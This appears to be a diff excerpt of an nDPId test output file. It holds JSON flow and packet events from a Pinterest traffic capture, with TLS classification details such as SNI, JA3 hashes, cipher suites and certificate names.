 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAzjWACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnIBu3hJrMEZEzjGgBAB+8yHAAABAQgK1mIgKsK5Ifs="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsVQqoALgBAB+wmKAAABAQgK1mIgKsK5Ifs="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAI0zACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElngBu4oDE2bprOc6gBAB+9UUAAABAQgK1mIgKsK5Ifs="}
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714181,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-02750{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":648,"midstream":0,"ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":127,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-02751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-02751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-02751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":449,"midstream":0,"ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
-02751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
